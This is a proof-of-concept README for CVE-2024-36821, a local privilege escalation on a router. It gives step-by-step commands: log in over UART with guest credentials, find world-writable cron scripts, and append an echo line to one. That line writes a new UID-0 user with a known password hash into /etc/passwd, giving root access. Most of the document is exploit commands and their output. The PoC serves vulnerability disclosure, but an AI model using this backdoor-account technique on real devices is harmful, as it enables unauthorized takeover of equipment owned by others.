The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821
# CVE-2024-36821
The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821
### The original video with PoC you may find on the video -> https://www.youtube.com/watch?v=6vHno0ik7JY
### The PoC:
1. Connect to the router witnin UART conenction
2. Using `guest:guest` credentials, log into the system
3. Using `find / -perm -777 -type f 2>/dev/null` command, find files with read-write-execute permissions:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
<img width="456" alt="Screenshot 2024-06-10 at 20 00 50" src="https://github.com/IvanGlinkin/CVE-2024-36821/assets/64857726/b464856d-e222-493c-a697-1c3fe4cbbd98">
5. Check the owner by `ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh` command
6. Generate the password by `openssl passwd Abracadabra` command
7. Edit `/tmp/cron/cron.everyminute/conntrack_collector.sh`, adding to the end the new generated password:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
<img width="424" alt="Screenshot 2024-06-10 at 20 05 05" src="https://github.com/IvanGlinkin/CVE-2024-36821/assets/64857726/babb8bae-cc11-49e2-9b76-d45fd26c21d1">
9. Wait for a minute
10. Switch user into root2 by the next command
/ $ su root2
Password: Abracadabra
~ #
[4.0K] /data/pocs/cd7be423419749491b051ab4af36fb36f626eb07
└── [1.5K] README.md
0 directories, 1 file
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